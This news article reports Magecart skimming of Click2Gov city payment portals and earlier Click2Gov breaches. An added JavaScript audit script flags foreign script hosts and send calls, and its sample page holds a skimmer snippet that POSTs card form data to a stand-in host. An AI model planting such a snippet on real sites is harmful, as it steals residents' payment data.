Credit Card Skimming Attacks on US Local Government Services

Credit card skimming attacks are already on the rise in 2020 and it seems that this trend will continue into the near future. The security firm Trend Micro observed a new series of credit card skimming attacks in June 2020.

Magecart skimmer with a twist

In the latest attacks, the hackers used a Magecart skimmer (TrojanSpy.JS.MAGECART.G) to compromise the websites. It is believed that these attacks started on April 10, 2020, and are still active.
  • The attackers targeted eight US cities’ local government services to host credit card skimmers which passed on the credit card details of residents to cybercriminals.
  • The websites using the Click2Gov platform were compromised with the JavaScript-based skimmer to exfiltrate credit card information (card number, expiration date, CVV) and personal information (name and contact address).
  • This time, attackers did not implement obfuscation or anti-debugging techniques. As soon as any user enters credit card related details, the skimmer will immediately send these to a remote server via an HTTP POST request.

Recent Click2Gov breaches

Click2Gov has been targeted by several breaches and attacks in the past.
  • In February, the financial information of Carson City residents was compromised due to a security vulnerability in its third-party vendor's online payment system, Click2Gov.
  • In January, the City of Bend’s online utility payment portal, which uses Click2Gov, suffered a data security breach that compromised the payment card information of some city utility customers.
  • Several other US cities (Aurora, Marietta, City of Sugar Land, City of Waco, and the City of Odessa) were affected in December 2019 data breaches.


Credit card skimming attacks are a major threat not only to e-commerce sites but also to academic institutions and hotel chains. Organizations should keep their payment portals secure by updating all the software and plugins used in the portal and by regularly auditing the code.
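
One way to automate part of that code audit, as an added example that is not from the original article or from Trend Micro: a static check that lists every script host and every hard-coded send destination on a payment page that is not on an allowlist. The function names, hosts and sample HTML are constructed assumptions.

```javascript
// Added example: static audit of a payment page for script hosts and
// network destinations outside an allowlist. All names are hypothetical.
const SEND_PRIMITIVES = /XMLHttpRequest|\bfetch\s*\(|sendBeacon|\$\.(ajax|post)\s*\(/;
const URL_LITERAL = /["'`](https?:\/\/[^"'`\s]+)["'`]/g;

function hostOf(ref, base) {
  try { return new URL(ref, base).host; } catch { return null; }
}

function auditPaymentPage(html, pageUrl, allowedHosts) {
  const allowed = new Set([new URL(pageUrl).host, ...allowedHosts]);
  const findings = [];
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      // External script: the host serving it must be an expected one.
      const host = hostOf(src[1], pageUrl);
      if (!host || !allowed.has(host)) findings.push({ kind: "script-src", host, ref: src[1] });
      continue;
    }
    // Inline script: only of interest if it is able to send data somewhere.
    if (!SEND_PRIMITIVES.test(body)) continue;
    for (const u of body.matchAll(URL_LITERAL)) {
      const host = hostOf(u[1], pageUrl);
      if (host && !allowed.has(host)) findings.push({ kind: "inline-send", host, ref: u[1] });
    }
  }
  return findings;
}

// Constructed sample page (not taken from any real site).
const SAMPLE_HTML = `
<html><body>
<form id="pay"><input name="cardNumber"><input name="cvv"></form>
<script src="/static/portal.js"></script>
<script src="https://cdn.vendor.example/lib.js"></script>
<script>
  document.getElementById("pay").addEventListener("submit", function () {
    var x = new XMLHttpRequest();
    x.open("POST", "https://collector.invalid/log");
    x.send(new FormData(this));
  });
</script>
</body></html>`;

console.log(auditPaymentPage(SAMPLE_HTML, "https://pay.city.example/portal", ["cdn.vendor.example"]));
```

Matching URL literals works here only because the skimmer described above used no obfuscation; a destination that is assembled at runtime would not be caught by this check.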

Cyware Publisher